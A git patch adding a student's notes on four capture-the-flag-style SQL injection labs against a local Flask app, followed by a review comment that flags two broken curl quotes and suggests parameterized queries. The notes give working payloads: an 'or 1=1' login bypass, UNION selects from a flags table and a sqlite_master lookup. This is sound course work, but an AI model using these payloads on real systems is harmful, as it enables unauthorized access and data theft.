From 1d2e70a16fea861625664178dcaedd8559c624c2 Mon Sep 17 00:00:00 2001 From: Kaushik Narayan R Date: Sun, 1 Dec 2024 18:42:46 -0700 Subject: [PATCH] lab 5b - sql injections --- Dojo Notes.md | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/Dojo Notes.md b/Dojo Notes.md index b512c32..fed57a1 100644 --- a/Dojo Notes.md +++ b/Dojo Notes.md @@ -577,6 +577,36 @@ honestly idk just check class vid and script ### lab 5b.1 - sql pass to session +- unsanitized SQL query in flask app +- simple injection +- app sets session cookie for 'login', use that to curl again and app prints flag +- do injection to get cookie `curl -c cookies.txt 'http://lab.localhost?username="hi"+or+1=1+--&password=admin'` +- then use cookie `curl -b cookies.txt 'http://lab.localhost` + +### lab 5b.1 - sql pass to session ii + +- input escaped by double quote +- break it then do the same +- `curl -c cookies.txt 'http://lab.localhost?username="+or+1=1+--&password=admin'` +- i.e. a single " to break + +### lab 5b.3 - unionize + +- same double quote escape +- no added select query in app to get flag, we hv to inject a select query +- add a union clause and select from flags table +- when it tries to convert the rowid with int(), it will print the error as the 'rowid' here is the flag string that we selected, so it can't convert a string +- also a POST request +- `curl -X POST 'http://lab.localhost' -d 'username="union%20select%20*%20from%20flags%20--&password=admin` + +### lab 5b.4 - master union with 64 + +- flag is base64 encoded and used in a table's name +- but it's the same unionize vuln +- so let's get the table name from the sqlite master table - `SELECT name FROM sqlite_master WHERE type='table'` +- so: `curl 'http://lab.localhost/?query=test"union+select+name+from+sqlite_master+where+type="table"--'` +- then `base64 -d` + ## Project 04 - continued ### .16 - arg wars VI - return of the hacker - reattempt
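Review bot: two of the added curl commands are missing their closing single quote and will not run as pasted: `curl -b cookies.txt 'http://lab.localhost` under lab 5b.1 and the `-d 'username=...&password=admin` argument under lab 5b.3 both need a trailing `'`. The second heading also reuses the label `lab 5b.1 - sql pass to session ii` while the sections that follow are numbered 5b.3 and 5b.4, which looks like a numbering slip. Since every section opens by naming the root cause (a query built by concatenating unsanitized input, with double-quote escaping as the only guard), consider adding a one-line takeaway per lab on the remediation: bind user input through the driver's parameter placeholders (`?` in Python's sqlite3) rather than quoting it into the SQL string, which closes all four variants shown here, including the union-based ones and the sqlite_master lookup.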